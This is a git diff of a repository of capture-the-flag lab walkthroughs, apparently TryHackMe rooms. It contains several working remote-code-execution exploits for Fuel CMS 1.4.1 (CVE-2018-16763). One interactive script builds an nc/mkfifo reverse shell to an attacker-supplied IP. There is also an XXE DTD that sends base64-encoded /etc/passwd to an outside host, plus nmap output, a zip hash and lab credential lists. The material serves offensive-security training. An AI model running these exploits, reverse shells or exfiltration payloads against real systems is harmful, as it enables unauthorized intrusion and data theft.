cmd = input(col.LIGHT_WHITE +"fuelCMS$ " + col.RESET)
if cmd[0:4].lower() == "exit":
print(col.RED + "Exiting..." + col.RESET)
sys.exit(0)
if cmd[0:8] == "shell_me":
IP2, PORT = input(col.LIGHT_BLUE + "Enter your attacking machine IP:PORT $ " + col.RESET).split(":")
nc = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP2} {PORT} >/tmp/f"
cmd = nc
print(col.LIGHT_GREEN + "\nHope you had your listener ready!!" + col.RESET)
if cmd[0:4] == "help":
print(help())
continue
if not "/tmp/f;mkfifo" in cmd:
print(col.LIGHT_GRAY + "Sending request." + col.RESET)
cmd = urllib.parse.quote(cmd)
r = requests.get(f"http://{IP}/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27"+ cmd +"%27)%2B%27")
if r.status_code == 200:
page = parsePage(r.text)
if page == "\n":
print(col.RED + "No result" + col.RESET)
continue
print(col.LIGHT_GREEN+ f"\n{page.strip()}" + col.RESET)
except Exception as e:
print(col.RED + f"An error occured, please try again...\n\n{e}" + col.RESET)

51
Walkthroughs/VulnerabilityCapstone/exploit.rb Executable file
View File

@@ -0,0 +1,51 @@
# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-11-14
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu 16.04
# CVE : CVE-2018-16763
# References: https://www.exploit-db.com/exploits/47138
#!/usr/bin/env ruby
require 'httpclient'
require 'docopt'
# dirty workaround to ignore Max-Age
# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
$VERBOSE = nil
doc = <<~DOCOPT
Fuel CMS 1.4 - Remote Code Execution
Usage:
#{__FILE__} <url> <cmd>
#{__FILE__} -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<cmd> The system command to execute
-h, --help Show this screen
Examples:
#{__FILE__} http://example.org id
#{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
DOCOPT
def exploit(client, root_url, cmd)
url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
res = client.get(url)
/system(.+?)<div/mx.match(res.body).captures[0].chomp
end
begin
args = Docopt.docopt(doc)
clnt = HTTPClient.new
puts exploit(clnt, args['<url>'], args['<cmd>'])
rescue Docopt::Exit => e
puts e.message
end

34
Walkthroughs/VulnerabilityCapstone/exploit1.py Executable file
View File

@@ -0,0 +1,34 @@
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
import requests
import urllib
url = "http://10.10.225.250"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
proxy = {"http":"http://127.0.0.1:8080"}
r = requests.get(burp0_url, proxies=proxy)
html = "<!DOCTYPE html>"
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]

63
Walkthroughs/VulnerabilityCapstone/exploit2.py Executable file
View File

@@ -0,0 +1,63 @@
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#!/usr/bin/python3
import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style
def get_arguments():
parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
args = parser.parse_args()
if len(sys.argv) <=2:
parser.print_usage()
sys.exit()
return args
args = get_arguments()
url = args.url
if "http" not in url:
sys.stderr.write("Enter vaild url")
sys.exit()
try:
r = requests.get(url)
if r.status_code == 200:
print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
except requests.ConnectionError:
print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
sys.exit()
while True:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)
#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
print(output[0])
if cmd == "exit":
break

100456
Walkthroughs/VulnerabilityCapstone/requests Normal file
View File

File diff suppressed because it is too large Load Diff

4
Walkthroughs/VulnerabilityCapstone/scan1.gnmap Normal file
View File

@@ -0,0 +1,4 @@
# Nmap 7.95 scan initiated Sun Oct 12 15:59:04 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oG scan1.gnmap 10.10.225.250
Host: 10.10.225.250 () Status: Up
Host: 10.10.225.250 () Ports: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/ Ignored State: closed (998) OS: Linux 4.15 Seq Index: 264 IP ID Seq: All zeros
# Nmap done at Sun Oct 12 15:59:19 2025 -- 1 IP address (1 host up) scanned in 14.79 seconds

BIN
Walkthroughs/WindowsPrivilegesEscalation/share/sam.hive Executable file
View File

Binary file not shown.

BIN
Walkthroughs/WindowsPrivilegesEscalation/share/system.hive Executable file
View File

Binary file not shown.

3
Walkthroughs/XXE/sample.dtd Normal file
View File

@@ -0,0 +1,3 @@
<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oobxxe "<!ENTITY exfil SYSTEM 'http://10.14.99.89:1337/?data=%cmd;'>">
%oobxxe;

0
Walkthroughs/XXE/test.txt Normal file
View File

BIN
Walkthroughs/agent-sudo/Alien_autospy.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 41 KiB

6
Walkthroughs/agent-sudo/To_agentJ.txt Normal file
View File

@@ -0,0 +1,6 @@
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C

BIN
Walkthroughs/agent-sudo/_cutie.png.extracted/365 Normal file
View File

Binary file not shown.

BIN
Walkthroughs/agent-sudo/_cutie.png.extracted/365.zlib Normal file
View File

Binary file not shown.

BIN
Walkthroughs/agent-sudo/_cutie.png.extracted/8702.zip Normal file
View File

Binary file not shown.

6
Walkthroughs/agent-sudo/_cutie.png.extracted/To_agentR.txt Normal file
View File

@@ -0,0 +1,6 @@
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R

1
Walkthroughs/agent-sudo/_cutie.png.extracted/zip.hash Normal file
View File

@@ -0,0 +1 @@
8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip

BIN
Walkthroughs/agent-sudo/cute-alien.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 32 KiB

BIN
Walkthroughs/agent-sudo/cutie.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 34 KiB

8
Walkthroughs/agent-sudo/message.txt Normal file
View File

@@ -0,0 +1,8 @@
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris

BIN
Walkthroughs/burpsuite/AlteredKeys.zip Normal file
View File

Binary file not shown.

BIN
Walkthroughs/burpsuite/BastionHostingCreds.zip Normal file
View File

Binary file not shown.

100
Walkthroughs/burpsuite/combined.txt Normal file
View File

@@ -0,0 +1,100 @@
l.madden@bastionhosting.thm:bambam
j.poole@bastionhosting.thm:UnitedKingdom123
i.hopkins@bastionhosting.thm:1q2q3q
l.mayo@bastionhosting.thm:valencia
m.roberts@bastionhosting.thm:258852
m.ratliff@bastionhosting.thm:10031991
j.morrison@bastionhosting.thm:wolverine
r.carroll@bastionhosting.thm:12111991
t.nichols@bastionhosting.thm:asdfghj
d.decker@bastionhosting.thm:02011976
l.pena@bastionhosting.thm:eeeeeee
g.moon@bastionhosting.thm:mission
r.miles@bastionhosting.thm:29011985
s.bray@bastionhosting.thm:enterprise
n.mckay@bastionhosting.thm:hfytnrb
e.richards@bastionhosting.thm:ferrari1
g.dunn@bastionhosting.thm:steve
k.house@bastionhosting.thm:tigge
p.davenport@bastionhosting.thm:edward
a.black@bastionhosting.thm:gizmo
v.blake@bastionhosting.thm:bluemoon
a.mcmahon@bastionhosting.thm:fktyrf
s.lester@bastionhosting.thm:rfnthbyf
m.schmidt@bastionhosting.thm:megane
j.shepard@bastionhosting.thm:alpine
m.mcconnell@bastionhosting.thm:project
y.dudley@bastionhosting.thm:tomcat
j.cobb@bastionhosting.thm:147852
r.gallagher@bastionhosting.thm:nicole1
p.oneil@bastionhosting.thm:05051987
r.lyons@bastionhosting.thm:11101986
v.delgado@bastionhosting.thm:angel
h.castillo@bastionhosting.thm:lambda
t.hinton@bastionhosting.thm:B@astion
o.bennett@bastionhosting.thm:bella1
b.buckner@bastionhosting.thm:elefant
a.peters@bastionhosting.thm:78945612
d.whitney@bastionhosting.thm:raven1
l.soto@bastionhosting.thm:istanbul
c.mays@bastionhosting.thm:23061992
d.pennington@bastionhosting.thm:ineedanewjob
j.wilcox@bastionhosting.thm:corleone
f.willis@bastionhosting.thm:brooke
t.melendez@bastionhosting.thm:bobdylan
l.pacheco@bastionhosting.thm:iceman
o.barton@bastionhosting.thm:westham
y.williams@bastionhosting.thm:lane
d.sanders@bastionhosting.thm:19791979
m.hicks@bastionhosting.thm:compton
m.rivera@bastionhosting.thm:letmein1
d.banks@bastionhosting.thm:1964
t.wilkinson@bastionhosting.thm:gocaley
l.holmes@bastionhosting.thm:N5rM6voVzxzZ8xC7
a.holland@bastionhosting.thm:wrench
r.macias@bastionhosting.thm:BastionHostingCTOForTheWin
d.vincent@bastionhosting.thm:25011985
s.ford@bastionhosting.thm:sanders
j.perry@bastionhosting.thm:Sailing<3
b.hebert@bastionhosting.thm:benessere
c.castro@bastionhosting.thm:19283746
m.moss@bastionhosting.thm:123456789a
m.cross@bastionhosting.thm:qwqwqwqw
b.byers@bastionhosting.thm:15021983
t.glass@bastionhosting.thm:andrei
v.palmer@bastionhosting.thm:b4st10n
t.potter@bastionhosting.thm:dima
j.bird@bastionhosting.thm:blades
l.mckee@bastionhosting.thm:24101990
o.parsons@bastionhosting.thm:gofish
j.oliver@bastionhosting.thm:marianna
l.frederick@bastionhosting.thm:terminat
v.doyle@bastionhosting.thm:joshua
c.olsen@bastionhosting.thm:twilight
j.stout@bastionhosting.thm:beemer
e.sims@bastionhosting.thm:797979
d.avila@bastionhosting.thm:face
z.newton@bastionhosting.thm:88888
t.aguirre@bastionhosting.thm:black
a.tucker@bastionhosting.thm:ariel
t.goff@bastionhosting.thm:guiness
i.cohen@bastionhosting.thm:nokia1
c.farley@bastionhosting.thm:11051988
m.lynch@bastionhosting.thm:14141414
y.stark@bastionhosting.thm:highlander
j.wolfe@bastionhosting.thm:elvira
q.rivas@bastionhosting.thm:pinkfloyd
d.zimmerman@bastionhosting.thm:caroline
d.goodwin@bastionhosting.thm:bmw325
j.kramer@bastionhosting.thm:sullivan
i.shelton@bastionhosting.thm:premier
l.butler@bastionhosting.thm:whistler
m.jensen@bastionhosting.thm:21071989
b.kidd@bastionhosting.thm:raquel
r.small@bastionhosting.thm:bastionh0sting
m.baldwin@bastionhosting.thm:05111986
m.sweeney@bastionhosting.thm:mishka
l.austin@bastionhosting.thm:chris
a.tyson@bastionhosting.thm:1983
l.watts@bastionhosting.thm:piccolo
r.roach@bastionhosting.thm:Justin<31978

100
Walkthroughs/burpsuite/emails.txt Normal file
View File

@@ -0,0 +1,100 @@
l.madden@bastionhosting.thm
j.poole@bastionhosting.thm
i.hopkins@bastionhosting.thm
l.mayo@bastionhosting.thm
m.roberts@bastionhosting.thm
m.ratliff@bastionhosting.thm
j.morrison@bastionhosting.thm
r.carroll@bastionhosting.thm
t.nichols@bastionhosting.thm
d.decker@bastionhosting.thm
l.pena@bastionhosting.thm
g.moon@bastionhosting.thm
r.miles@bastionhosting.thm
s.bray@bastionhosting.thm
n.mckay@bastionhosting.thm
e.richards@bastionhosting.thm
g.dunn@bastionhosting.thm
k.house@bastionhosting.thm
p.davenport@bastionhosting.thm
a.black@bastionhosting.thm
v.blake@bastionhosting.thm
a.mcmahon@bastionhosting.thm
s.lester@bastionhosting.thm
m.schmidt@bastionhosting.thm
j.shepard@bastionhosting.thm
m.mcconnell@bastionhosting.thm
y.dudley@bastionhosting.thm
j.cobb@bastionhosting.thm
r.gallagher@bastionhosting.thm
p.oneil@bastionhosting.thm
r.lyons@bastionhosting.thm
v.delgado@bastionhosting.thm
h.castillo@bastionhosting.thm
t.hinton@bastionhosting.thm
o.bennett@bastionhosting.thm
b.buckner@bastionhosting.thm
a.peters@bastionhosting.thm
d.whitney@bastionhosting.thm
l.soto@bastionhosting.thm
c.mays@bastionhosting.thm
d.pennington@bastionhosting.thm
j.wilcox@bastionhosting.thm
f.willis@bastionhosting.thm
t.melendez@bastionhosting.thm
l.pacheco@bastionhosting.thm
o.barton@bastionhosting.thm
y.williams@bastionhosting.thm
d.sanders@bastionhosting.thm
m.hicks@bastionhosting.thm
m.rivera@bastionhosting.thm
d.banks@bastionhosting.thm
t.wilkinson@bastionhosting.thm
l.holmes@bastionhosting.thm
a.holland@bastionhosting.thm
r.macias@bastionhosting.thm
d.vincent@bastionhosting.thm
s.ford@bastionhosting.thm
j.perry@bastionhosting.thm
b.hebert@bastionhosting.thm
c.castro@bastionhosting.thm
m.moss@bastionhosting.thm
m.cross@bastionhosting.thm
b.byers@bastionhosting.thm
t.glass@bastionhosting.thm
v.palmer@bastionhosting.thm
t.potter@bastionhosting.thm
j.bird@bastionhosting.thm
l.mckee@bastionhosting.thm
o.parsons@bastionhosting.thm
j.oliver@bastionhosting.thm
l.frederick@bastionhosting.thm
v.doyle@bastionhosting.thm
c.olsen@bastionhosting.thm
j.stout@bastionhosting.thm
e.sims@bastionhosting.thm
d.avila@bastionhosting.thm
z.newton@bastionhosting.thm
t.aguirre@bastionhosting.thm
a.tucker@bastionhosting.thm
t.goff@bastionhosting.thm
i.cohen@bastionhosting.thm
c.farley@bastionhosting.thm
m.lynch@bastionhosting.thm
y.stark@bastionhosting.thm
j.wolfe@bastionhosting.thm
q.rivas@bastionhosting.thm
d.zimmerman@bastionhosting.thm
d.goodwin@bastionhosting.thm
j.kramer@bastionhosting.thm
i.shelton@bastionhosting.thm
l.butler@bastionhosting.thm
m.jensen@bastionhosting.thm
b.kidd@bastionhosting.thm
r.small@bastionhosting.thm
m.baldwin@bastionhosting.thm
m.sweeney@bastionhosting.thm
l.austin@bastionhosting.thm
a.tyson@bastionhosting.thm
l.watts@bastionhosting.thm
r.roach@bastionhosting.thm

Some files were not shown because too many files have changed in this diff Show More